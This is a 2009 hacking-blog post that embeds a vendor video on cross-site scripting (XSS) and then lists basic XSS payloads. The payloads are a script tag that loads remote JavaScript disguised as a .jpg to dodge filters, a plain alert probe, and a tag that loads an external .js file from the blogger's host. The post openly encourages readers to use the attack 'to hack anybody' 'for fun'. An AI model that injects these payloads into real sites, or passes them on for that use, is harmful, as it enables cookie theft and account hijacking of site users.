Email Techs

  • Subscribe to our RSS feed.
  • Twitter
  • StumbleUpon
  • Reddit
  • Facebook
  • Digg

Tuesday, 1 December 2009

Basic XSS Cross Site Scripting Demo [Video]

Posted on 23:03 by Unknown

Allot of you guys aren't clear with xss aka cross site scripting and for that many of you were sending me mails on how to do xss attack , etc and that's why i got this video which explains some basic concepts of the Xss attack and how it can be practiced and how can we use it to hack anybody.

This video is controversial by Brial Contos, CISSP from a company named IMPERVA. it takes through each and every step involved to find a xss vulnerability in a webpage . and showcases some of the basic steps that you need to know.

 

What is XSS

Cross-site scripting ('XSS' or 'CSS') is an attack that takes advantage of a Web site vulnerability in which the site displays content that includes un-sanitized user-provided data. For example, an attacker might place a hyperlink with an embedded malicious script into an online discussion forum….

 

That purpose of the malicious script is to attack other forum users who happen to select the hyperlink. For example it could copy user cookies and then send those cookies to the attacker. The Script Injection video should be watched before this video for greater understanding.

 

Video



Conclusion

Now you might be clear with xss attacks it is easy and can be used in man terms to hack anybody or anything else for fun also. Now lets take a look at some of the commonly used xss scripts and code snippets -


Assuming you can only fit in a few characters and it filters against ".js" you can rename your JavaScript file to an image as an XSS vector:

<SCRIPT SRC="http://hackerthedude.blogspot.com/xss.jpg”></SCRIPT>

 

This is most simplest snippet used to find a Xss vulnerability in a webpage.

<SCRIPT>alert('XSS');</SCRIPT>

 

This is a normal XSS JavaScript injection, and most likely to get caught but I suggest trying it first (the quotes are not required in any modern browser so they are omitted here):

<SCRIPT SRC=”http://hackerthedude.blogspot.com/xss.js”></SCRIPT>

 

There are many more xss vulnerabilities you can use to bypass the security but they are most useful to find a xss vulnerability in webpage.

 

 

Happy Hacking @hackerthedude

Email ThisBlogThis!Share to XShare to Facebook
Posted in Hacking, Pro Hacks, Video's | No comments
Newer Post Older Post Home

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Popular Posts

  • Dear Mozilla, Please “DONT” fix this. [Pic]
    Today only i found this pic on Digg and i thought there should be a “DONT” in it. isn't it ? ..
  • Ubisoft Hacked : Fake or Real ?
    Some days ago we got news about Ubisoft being hacked by some hackers and was being believed till yet but after then some news breached out...
  • VMWare Fusion 3.1 Beta On Grounds
    Check out the VMWare Fusion 3.1 Beta which have been out just now. Its includes some of the significant features which many of the users ha...
  • XBox Live Hacked or Suffering Connection Issues
    Today Xbox Live users are suffering some Connection Issues and this is excepted as yesterday only the Xbox live account of Xbox’s Live Prog...
  • Check Network Connectivity With Power of PowerShell [Script]
    Some days ago i got some scripts from one of my friend which was certain to use when pentesting stuff for Testing the internet connectivity ...
  • ‘New Moon” Fans Beware Of Hackers
    We are Getting Constant Rumors from many places that Hackers are going to target the the fans of the upcoming movie “New Moon” ...
  • New iPhone Worm That Attacks Jail Broken iPhones Also
    Well its again the iPhone which have come to the headlines again , But this time the apple is really pissed of with the kind of work the Ha...
  • Yeah, We are Back !
    Guys, i know its been a long time since i haven't blogged the things in information sec. but if you see it was worth it. I got to learn...
  • Ophcrack Guide : Hack Any Password In Windows
    There might be many times you have heard of Ophcrack, now what is actually it well is a popular to crack passwords in windows. Many...
  • MacOSX Gets Massive Security Update
    This is kinda weird but safe for the users at the same time Apple have just launched the update for the Mac OSX with a severe patchment of 9...

Categories

  • Broadband
  • cyberwar
  • Ebooks
  • email
  • Gamers
  • Guides
  • Hacked
  • Hacker The Dude News
  • Hacking
  • Hacking Software
  • keylogger
  • Misc
  • Mobie's
  • News
  • Orkut
  • PHP
  • Pics
  • Pro Hacks
  • Small Hacks
  • Stylize
  • Tools
  • Torrent
  • Tricks
  • Twitter
  • Video's
  • Virus's
  • Weekly Top 10 Internet Tools
  • Windows
  • XSS

Blog Archive

  • ►  2010 (32)
    • ►  March (7)
    • ►  February (3)
    • ►  January (22)
  • ▼  2009 (123)
    • ▼  December (34)
      • The Anatomy Of GSM Encryption Hack
      • Your Mobile Is In Danger : Karsten Nohl Cracks GSM...
      • WinScanX : A Simple, Fast and Portable Windows Aud...
      • Total Round Up For "Top 10 Sexy Hackers of 2009"
      • Christmas Present For Hackers [Pic]
      • Net Wars : New Challenge For Hackers [Video]
      • FBI Is Watching You : Now On Facebook, Twitter, Yo...
      • Process Hacker V1.9 Released
      • AWeber Hacked : Recent Data Compromise
      • RSnake's 2nd Take On DNS Rebinding
      • Finding IP address in Gmail From Email Header's
      • The Top Targeted Brands Of 2009 [Pic]
      • Bootkit : One Deadly Weapon In The Attacker Arsenal
      • Is Google Public DNS Safe ?
      • New Html 5 XSS Vector’s By Gareth Heyes
      • Keep Your Encrypted Notes Safe With Fsekrit
      • The Anatomy of the Twitter Hack - Twitter's DNS Se...
      • Wireshark v1.2.5 Released
      • 30 Million Facebook, MySpace, and Orkut ID’s Hacked
      • Hackers Slays Microsoft’s Forensics Toolkit
      • Torpig Domain Generator : Hackers Using Twitter Tr...
      • Motorola Droid Jailbroken By Hackers
      • The History of Hacking [Pic]
      • The Year's Most-Hacked Software – Forbes
      • Hackers Like Google Chrome OS
      • Co-NASA Websites Hacked With SQL Injections
      • OllyDbg Beta 2 Final Released
      • RSnake On DNS Rebinding [Video]
      • Is Your Son a Computer Hacker ?
      • Safe Yourself From XSS Attack : Microsoft Anti-Cro...
      • Hackers Now Attacking Swine Flu Patients – Fake Va...
      • Hackers Don’t Give A Shit [Pic]
      • Team Viewer 5 Beta Released
      • Basic XSS Cross Site Scripting Demo [Video]
    • ►  November (30)
    • ►  October (24)
    • ►  September (9)
    • ►  August (6)
    • ►  July (1)
    • ►  June (3)
    • ►  May (16)
Powered by Blogger.

About Me

Unknown
View my complete profile